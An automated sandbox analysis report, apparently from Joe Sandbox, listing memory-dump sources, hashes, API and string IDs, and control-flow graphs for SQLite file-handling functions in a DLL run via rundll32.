                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                • API String ID: 0-3486433936
                                                                                                                                                                                                • Opcode ID: a8cce34efd893987772023de496acb2ed41b0e0237eb379c01f4ffddc09e388e
                                                                                                                                                                                                • Instruction ID: bc0bf910bf8723c11861d8e434e59d5491f0fce83f01c48c8b881ef14ab0b0f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: a8cce34efd893987772023de496acb2ed41b0e0237eb379c01f4ffddc09e388e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FD2AFB2B0AB8386EB619B15D160BB977A0FB44B94F149239DE6D077E9DF38E450C700
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                • Opcode ID: 02c7020dbeffaddb209c397736d977bd09e424f1cef45ca7c9e20fd774730bbf
                                                                                                                                                                                                • Instruction ID: 4fa39554bd06e9cb4f2f00a346da78f1e466823f72b4f118a0007f9fb8fa3813
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02c7020dbeffaddb209c397736d977bd09e424f1cef45ca7c9e20fd774730bbf
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC327B21B0EA4796FB548B25A860B7973A0EF49BA4F155235DABD077F8CF7CE4409B00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                • API String ID: 0-2920599690
                                                                                                                                                                                                • Opcode ID: 23efda8c788d5151813877a2bae980d74d2ed6103f5c09a79c8e153aff1cc4d1
                                                                                                                                                                                                • Instruction ID: ede0ee005a04c5f667fcd329bae8ed805637b7562f20d02329db3d306ad3ac5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23efda8c788d5151813877a2bae980d74d2ed6103f5c09a79c8e153aff1cc4d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD328FA2B0AB8382EB648B259560B7977A0FF49B84F144135DA6E177E9DF7CF4908300
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                • Instruction ID: 95a0f1eb2cfbc4539ce1d04a21013635ef9035f0458c635bbc938631e7c90202
                                                                                                                                                                                                • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89B1E924B0BB4781FF589B15A87093433A5AF48B44F584836C9BD0B7F8EFAEE4958310
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                • Instruction ID: fd3d910ead99f78b6e58c079f4e3aea795ae3ce779868fc396f4135d65f4ff80
                                                                                                                                                                                                • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                • Instruction Fuzzy Hash: F0C16E22B0A68385FB559F2994B0B7D3791EF85BC8F194032DAAD472FDDEACD8418740

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 812 7ffdfb915320-7ffdfb91534c 813 7ffdfb91534e call 7ffdfba51dd0 812->813 814 7ffdfb915361-7ffdfb91536a 812->814 818 7ffdfb915353-7ffdfb915357 813->818 816 7ffdfb915379-7ffdfb91537d 814->816 817 7ffdfb91536c 814->817 819 7ffdfb91537f-7ffdfb91538b call 7ffdfba51840 816->819 820 7ffdfb915395-7ffdfb915398 816->820 817->816 823 7ffdfb91535d 818->823 824 7ffdfb91566a-7ffdfb915676 818->824 830 7ffdfb915611-7ffdfb915614 819->830 831 7ffdfb915391 819->831 821 7ffdfb91539e-7ffdfb9153e8 820->821 822 7ffdfb915616-7ffdfb915633 820->822 835 7ffdfb91541f-7ffdfb915421 821->835 836 7ffdfb9153ea-7ffdfb9153f9 821->836 826 7ffdfb915638-7ffdfb915647 822->826 823->814 828 7ffdfb915653-7ffdfb915659 826->828 829 7ffdfb915649-7ffdfb915650 826->829 833 7ffdfb915668 828->833 834 7ffdfb91565b 828->834 829->828 830->822 830->826 831->820 833->824 834->833 837 7ffdfb915423-7ffdfb915451 call 7ffdfba51a30 835->837 838 7ffdfb915456-7ffdfb91545c 835->838 836->835 844 7ffdfb9153fb-7ffdfb91541d call 7ffdfba51a30 836->844 842 7ffdfb9155fd-7ffdfb91560c 837->842 839 7ffdfb9154ae-7ffdfb9154c4 call 7ffdfb924be0 838->839 840 7ffdfb91545e-7ffdfb915466 838->840 854 7ffdfb9154d0-7ffdfb915502 839->854 855 7ffdfb9154c6-7ffdfb9154cb 839->855 840->842 843 7ffdfb91546c-7ffdfb915470 call 7ffdfb913a80 840->843 842->830 852 7ffdfb915475-7ffdfb915479 843->852 844->835 852->839 857 7ffdfb91547b-7ffdfb9154a9 call 7ffdfba51a30 852->857 854->842 856 7ffdfb915508 854->856 855->842 858 7ffdfb915510-7ffdfb915539 CreateFileMappingW 856->858 857->842 859 7ffdfb9155b4-7ffdfb9155eb call 7ffdfba51a30 858->859 860 7ffdfb91553b-7ffdfb91557f MapViewOfFile 858->860 859->842 869 7ffdfb9155ed-7ffdfb9155f4 859->869 860->859 862 7ffdfb915581-7ffdfb9155ac 860->862 862->858 864 7ffdfb9155b2 862->864 864->842 869->842
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateMappingView
                                                                                                                                                                                                • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                • API String ID: 3452162329-2257004166
                                                                                                                                                                                                • Opcode ID: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                • Instruction ID: ade1e63d2563c1b59522e21e819e96e472204c5be0884c3d8d4a923dac10bb7f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F919C72B0AA4396EB648F25E460A6937A1FB88B98F564136CA6D577FCDF3CD401C700

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1277 7ffdfb913a80-7ffdfb913a9a 1278 7ffdfb913aae-7ffdfb913ab4 1277->1278 1279 7ffdfb913a9c-7ffdfb913aad 1277->1279 1280 7ffdfb913ab6-7ffdfb913ac7 1278->1280 1281 7ffdfb913aca-7ffdfb913ad3 1278->1281 1280->1281 1282 7ffdfb913ad5-7ffdfb913ad9 1281->1282 1283 7ffdfb913adb 1281->1283 1284 7ffdfb913ade-7ffdfb913b13 call 7ffdfba52700 SetFilePointer 1282->1284 1283->1284 1287 7ffdfb913b15-7ffdfb913b24 1284->1287 1288 7ffdfb913b59-7ffdfb913b6c SetEndOfFile 1284->1288 1287->1288 1296 7ffdfb913b26-7ffdfb913b57 call 7ffdfba51a30 1287->1296 1289 7ffdfb913b6e-7ffdfb913b80 1288->1289 1290 7ffdfb913bab-7ffdfb913bae 1288->1290 1289->1290 1298 7ffdfb913b82-7ffdfb913b8c 1289->1298 1291 7ffdfb913bb0-7ffdfb913bbd 1290->1291 1292 7ffdfb913bc7-7ffdfb913bdd 1290->1292 1294 7ffdfb913bbf 1291->1294 1295 7ffdfb913bc2 call 7ffdfba51b10 1291->1295 1294->1295 1295->1292 1301 7ffdfb913b91-7ffdfb913ba9 call 7ffdfba51a30 1296->1301 1298->1301 1301->1290 1301->1292
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                • API String ID: 973152223-2471937615
                                                                                                                                                                                                • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                • Instruction ID: a45ddc1062883f0a46d1ae2ce2dc9a67356e36d6606ed6216f0c60c79e4e4f34
                                                                                                                                                                                                • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8041AE21B0EA4396E7609F79A86097973A0EB48B94B14013ADE7D87BFCDF7CD4428700

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1551 7ffdfb9136f0-7ffdfb91371b 1552 7ffdfb91371d-7ffdfb913732 1551->1552 1553 7ffdfb91376b-7ffdfb913798 1551->1553 1554 7ffdfb913754-7ffdfb913768 call 7ffdfba5cf10 1552->1554 1555 7ffdfb913734 call 7ffdfba5cf10 1552->1555 1556 7ffdfb9137a0-7ffdfb9137cb ReadFile 1553->1556 1554->1553 1563 7ffdfb913739 1555->1563 1559 7ffdfb9137d1-7ffdfb9137e1 1556->1559 1560 7ffdfb913858-7ffdfb91385a 1556->1560 1559->1560 1569 7ffdfb9137e3-7ffdfb9137f6 1559->1569 1561 7ffdfb913888-7ffdfb913891 1560->1561 1562 7ffdfb91385c-7ffdfb913883 call 7ffdfb938730 1560->1562 1561->1563 1567 7ffdfb913897-7ffdfb9138ac call 7ffdfba5d5c0 1561->1567 1562->1561 1568 7ffdfb91373b-7ffdfb913753 1563->1568 1567->1568 1573 7ffdfb913830-7ffdfb913853 call 7ffdfba51a30 1569->1573 1574 7ffdfb9137f8-7ffdfb9137fe 1569->1574 1573->1568 1575 7ffdfb913800-7ffdfb913804 1574->1575 1576 7ffdfb913806-7ffdfb913809 1574->1576 1575->1576 1578 7ffdfb913812-7ffdfb91382b 1575->1578 1576->1578 1579 7ffdfb91380b-7ffdfb913810 1576->1579 1578->1556 1579->1573 1579->1578
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                • API String ID: 2738559852-1843600136
                                                                                                                                                                                                • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                • Instruction ID: e3aff398a577d5a90907287b3c9119bfe37dc769837ce5fac23f928f2475b12c
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69410F32B0EA43A2E7148F15E460CA9B7B5FB48B80F44113ADAAD476F8CF7CE0468340

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2190 7ffdfba49c70-7ffdfba49cb2 2191 7ffdfba49cb4-7ffdfba49cba 2190->2191 2192 7ffdfba49ce0-7ffdfba49ce2 2190->2192 2195 7ffdfba49cbc-7ffdfba49cc0 2191->2195 2196 7ffdfba49cc5-7ffdfba49cc8 2191->2196 2193 7ffdfba49d61-7ffdfba49d8b call 7ffdfb9c2470 * 2 2192->2193 2194 7ffdfba49ce4-7ffdfba49ce8 2192->2194 2218 7ffdfba49d91-7ffdfba49d99 2193->2218 2219 7ffdfba49e2c-7ffdfba49e4a 2193->2219 2200 7ffdfba49cea-7ffdfba49cf0 call 7ffdfba485f0 2194->2200 2201 7ffdfba49d4b-7ffdfba49d4f 2194->2201 2197 7ffdfba4a0d9-7ffdfba4a0f5 call 7ffdfba5bac0 2195->2197 2198 7ffdfba49cd3-7ffdfba49cd6 2196->2198 2199 7ffdfba49cca-7ffdfba49cd0 2196->2199 2198->2192 2199->2198 2209 7ffdfba49cf5-7ffdfba49cfa 2200->2209 2201->2193 2204 7ffdfba49d51-7ffdfba49d5c call 7ffdfba46ac0 2201->2204 2204->2197 2212 7ffdfba49d3e-7ffdfba49d42 2209->2212 2213 7ffdfba49cfc-7ffdfba49d03 2209->2213 2212->2201 2215 7ffdfba49d44-7ffdfba49d46 2212->2215 2216 7ffdfba49d21-7ffdfba49d28 2213->2216 2217 7ffdfba49d05-7ffdfba49d14 call 7ffdfba49420 2213->2217 2215->2197 2216->2197 2231 7ffdfba49d2d-7ffdfba49d30 2217->2231 2232 7ffdfba49d16-7ffdfba49d1c call 7ffdfba4a160 2217->2232 2218->2219 2223 7ffdfba49d9f-7ffdfba49da6 2218->2223 2220 7ffdfba49e4c-7ffdfba49e52 2219->2220 2221 7ffdfba49e56-7ffdfba49e5f 2219->2221 2220->2221 2224 7ffdfba49e60-7ffdfba49e6d 2221->2224 2226 7ffdfba49db1-7ffdfba49db5 2223->2226 2227 7ffdfba49da8-7ffdfba49daf 2223->2227 2229 7ffdfba49e6f-7ffdfba49e7a 2224->2229 2230 7ffdfba49e7c 2224->2230 2226->2219 2228 7ffdfba49db7-7ffdfba49dca call 7ffdfba49420 2226->2228 2227->2226 2227->2228 2241 7ffdfba49ddd-7ffdfba49ddf 2228->2241 2242 7ffdfba49dcc-7ffdfba49dd3 2228->2242 2235 7ffdfba49e7e-7ffdfba49e80 2229->2235 2230->2235 2231->2215 2233 7ffdfba49d32-7ffdfba49d39 2231->2233 2232->2216 2233->2197 2239 7ffdfba49e82-7ffdfba49ea1 RaiseException 2235->2239 2240 7ffdfba49ea7-7ffdfba49eaa 2235->2240 2239->2240 2243 7ffdfba49ebc 2240->2243 2244 7ffdfba49eac-7ffdfba49eaf 2240->2244 2246 7ffdfba49de1-7ffdfba49dff call 7ffdfb9c2470 call 7ffdfba5ce10 2241->2246 2247 7ffdfba49e20-7ffdfba49e23 2241->2247 2242->2241 2245 7ffdfba49ec0-7ffdfba49ec9 2243->2245 2244->2243 2248 7ffdfba49eb1-7ffdfba49eba 2244->2248 2245->2224 2249 7ffdfba49ecb-7ffdfba49ed4 2245->2249 2269 7ffdfba49e01-7ffdfba49e0f call 7ffdfba4a160 2246->2269 2270 7ffdfba49e14-7ffdfba49e1b 2246->2270 2247->2219 2250 7ffdfba49e25-7ffdfba49e27 2247->2250 2248->2245 2252 7ffdfba49f2e 2249->2252 2253 7ffdfba49ed6-7ffdfba49ed9 2249->2253 2254 7ffdfba4a0d1 2250->2254 2259 7ffdfba49f33-7ffdfba49f35 2252->2259 2256 7ffdfba49ee3-7ffdfba49eeb 2253->2256 2257 7ffdfba49edb-7ffdfba49edd 2253->2257 2254->2197 2261 7ffdfba49ef0-7ffdfba49ef4 2256->2261 2257->2256 2260 7ffdfba49fab 2257->2260 2263 7ffdfba49fb0-7ffdfba49fb4 2259->2263 2264 7ffdfba49f37-7ffdfba49f47 2259->2264 2260->2263 2265 7ffdfba49f5c 2261->2265 2266 7ffdfba49ef6-7ffdfba49f16 2261->2266 2267 7ffdfba49fe9-7ffdfba49ffa 2263->2267 2268 7ffdfba49fb6-7ffdfba49fd5 2263->2268 2271 7ffdfba4a0c9 2264->2271 2272 7ffdfba49f5e-7ffdfba49f76 2265->2272 2285 7ffdfba49f4c-7ffdfba49f5a 2266->2285 2286 7ffdfba49f18-7ffdfba49f1b 2266->2286 2273 7ffdfba4a03a-7ffdfba4a03e 2267->2273 2274 7ffdfba49ffc-7ffdfba4a009 2267->2274 2287 7ffdfba49fdb-7ffdfba49fe3 2268->2287 2288 7ffdfba4a085-7ffdfba4a08f 2268->2288 2269->2254 2270->2254 2271->2254 2276 7ffdfba49fa5-7ffdfba49fa9 2272->2276 2277 7ffdfba49f78-7ffdfba49f9f 2272->2277 2278 7ffdfba4a051-7ffdfba4a05b 2273->2278 2279 7ffdfba4a040-7ffdfba4a047 2273->2279 2274->2273 2290 7ffdfba4a00b-7ffdfba4a034 RaiseException 2274->2290 2276->2259 2277->2276 2283 7ffdfba4a091-7ffdfba4a095 2278->2283 2284 7ffdfba4a05d-7ffdfba4a07d call 7ffdfb9c2470 call 7ffdfba5ce10 2278->2284 2279->2278 2294 7ffdfba4a0c4 2283->2294 2295 7ffdfba4a097-7ffdfba4a0bd 2283->2295 2284->2283 2301 7ffdfba4a07f-7ffdfba4a083 2284->2301 2285->2272 2286->2271 2293 7ffdfba49f21-7ffdfba49f28 2286->2293 2287->2267 2288->2271 2290->2273 2293->2261 2297 7ffdfba49f2a 2293->2297 2294->2271 2295->2294 2297->2252 2301->2271
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                • Instruction ID: 45101a7489e00238e0fad200fe8d61a9b4eeb10801b18996639576080ebd71c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7D19132B0A647CAEB548F25D460A7933A1EB84B88F145035DA6E877F8DFBDE954C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
